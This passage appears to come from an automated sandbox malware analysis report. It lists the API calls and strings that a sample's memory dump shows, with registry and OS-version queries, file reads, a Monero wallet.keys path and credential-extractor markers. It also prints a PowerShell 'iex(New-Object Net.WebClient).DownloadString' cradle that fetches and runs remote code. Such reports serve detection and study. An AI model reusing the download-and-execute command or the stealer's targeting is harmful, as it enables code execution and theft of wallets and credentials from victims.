                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00085011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00085041
                                • InternetCloseHandle.WININET(?), ref: 000850B9
                                • InternetCloseHandle.WININET(?), ref: 000850C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: a9d2595ba0792dc5c00134e13e8527fb7036da5b0796c58664122551e9719b5a
                                • Instruction ID: 01837ce61112a0e20535907ef9b96ed4a6b8592a6090c554e335942988b78c8c
                                • Opcode Fuzzy Hash: a9d2595ba0792dc5c00134e13e8527fb7036da5b0796c58664122551e9719b5a
                                • Instruction Fuzzy Hash: 9931E6B4A4021CABDB20DF54DC89BDDB7B4FB48709F1081D9EA09A7281D7706A858F99
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                • wsprintfA.USER32 ref: 00098459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,00D0EA98,00000000,000F003F,?,00000400), ref: 000984EC
                                • lstrlen.KERNEL32(?), ref: 00098501
                                • RegQueryValueExA.ADVAPI32(00000000,00D0E978,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000A0B34), ref: 00098599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                • Instruction ID: d3e448c92bd64a8e7e9d4c4ccc6f03eae0e4b502a71defd288c1f88b4382608d
                                • Opcode Fuzzy Hash: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                • Instruction Fuzzy Hash: 8E21EB7191021C9BDB64DB54DC85FE9B3B8FB48704F00C5D8E649A6240DF716A85CFD4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000976A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000976AB
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE20,00000000,00020119,00000000), ref: 000976DD
                                • RegQueryValueExA.ADVAPI32(00000000,00D0E930,00000000,00000000,?,000000FF), ref: 000976FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00097708
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                • Instruction ID: a8e3920d274236e3eca6559199eee7c483683ec8489c8f47ee94ed1a0f88450a
                                • Opcode Fuzzy Hash: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                • Instruction Fuzzy Hash: 38016DB5A0420CBBEB00DBE4EC4DFAEB7B8EB48709F104194FA08D7291E6749904DB51
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0009773B
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE20,00000000,00020119,000976B9), ref: 0009775B
                                • RegQueryValueExA.ADVAPI32(000976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0009777A
                                • RegCloseKey.ADVAPI32(000976B9), ref: 00097784
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                • Instruction ID: 586df8aa2f1317cbda031f23b287618f71223e806fe60605c437993ef6cc1bb5
                                • Opcode Fuzzy Hash: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                • Instruction Fuzzy Hash: 440112B5A4030CBBEB00DBE4EC4EFAEB7B8FB48705F104559FA05A7291DA705A04CB52
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00093AEE,?), ref: 000992FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00099319
                                • CloseHandle.KERNEL32(000000FF), ref: 00099327
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-2052217321
                                • Opcode ID: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                • Instruction ID: 7b95bd8a590ced5df0d69f5119013ad1a842c8fe76755c33039d69fb99ab2d02
                                • Opcode Fuzzy Hash: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                • Instruction Fuzzy Hash: C2F03C75E44208FBDF20DFB4EC49F9EB7B9AB48710F10C258B651A72D0D67097019B50
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                • LocalFree.KERNEL32(0008148F), ref: 00089A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                • Instruction ID: d6f8461af0857a3cfb945ad84c8623d296412c710e55632014b62b6fe7b80baa
                                • Opcode Fuzzy Hash: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                • Instruction Fuzzy Hash: DE310AB4A00209EFDB14EF94D989FAE7BF9FF48344F148158E911A7290D774A941CFA2
                                APIs
                                • lstrcat.KERNEL32(?,00D0EBB8), ref: 000947DB
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094801
                                • lstrcat.KERNEL32(?,?), ref: 00094820
                                • lstrcat.KERNEL32(?,?), ref: 00094834
                                • lstrcat.KERNEL32(?,00CFA530), ref: 00094847
                                • lstrcat.KERNEL32(?,?), ref: 0009485B
                                • lstrcat.KERNEL32(?,00D0DD68), ref: 0009486F
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                  • Part of subcall function 00094570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                  • Part of subcall function 00094570: RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                  • Part of subcall function 00094570: wsprintfA.USER32 ref: 000945A6
                                  • Part of subcall function 00094570: FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                • Instruction ID: 2c2c3e7f4f97976ef5e1db9254bd49d0c12b57e50ca7298ecc3f9f865f988a97
                                • Opcode Fuzzy Hash: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                • Instruction Fuzzy Hash: A7317FB290021CA7CF10FBB0DC8AEE9737CAB48704F444589F35996082EE749789DB96
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00092D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092CC4
                                • <, xrefs: 00092D39
                                • ')", xrefs: 00092CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092D04
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                • Instruction ID: e89be59b5f21d0b84a00419fc10e3f9c6de35ff6afc83d4243486df7b854e1e0
                                • Opcode Fuzzy Hash: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                • Instruction Fuzzy Hash: 1B41DD71E102189ADF14EBA0D896BEEB774AF15300F404119E116AA192DF746A4AEFD2
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00089F41
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: f154a854584efd554e19b8a9eb7285bef967354f18d855cda6fb3378cbffff8c
                                • Instruction ID: 0c3277036ef0c40dc0c02859f83b0658d654f790406f208cfe476b0354f205f4
                                • Opcode Fuzzy Hash: f154a854584efd554e19b8a9eb7285bef967354f18d855cda6fb3378cbffff8c
                                • Instruction Fuzzy Hash: D4610D71A10248DBDF24EFA4CC96BEE77B5BF45300F048118F94A5F592EB706A06DB92
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00D0DF08,00000000,00020119,?), ref: 000940F4
                                • RegQueryValueExA.ADVAPI32(?,00D0EDB0,00000000,00000000,00000000,000000FF), ref: 00094118
                                • RegCloseKey.ADVAPI32(?), ref: 00094122
                                • lstrcat.KERNEL32(?,00000000), ref: 00094147
                                • lstrcat.KERNEL32(?,00D0EC00), ref: 0009415B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                • Instruction ID: 50b276cea78cf827573cde4a01559659fc521300c690b37dc4eeecf2a91f2029
                                • Opcode Fuzzy Hash: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                • Instruction Fuzzy Hash: 59418AB6D0010CABDB14FBA0FC4AFED777DBB48304F004558B61996182EA755B888B92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE58,00000000,00020119,?), ref: 00097E5E
                                • RegQueryValueExA.ADVAPI32(?,00D0DDE8,00000000,00000000,000000FF,000000FF), ref: 00097E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00097E92
                                Memory Dump Source
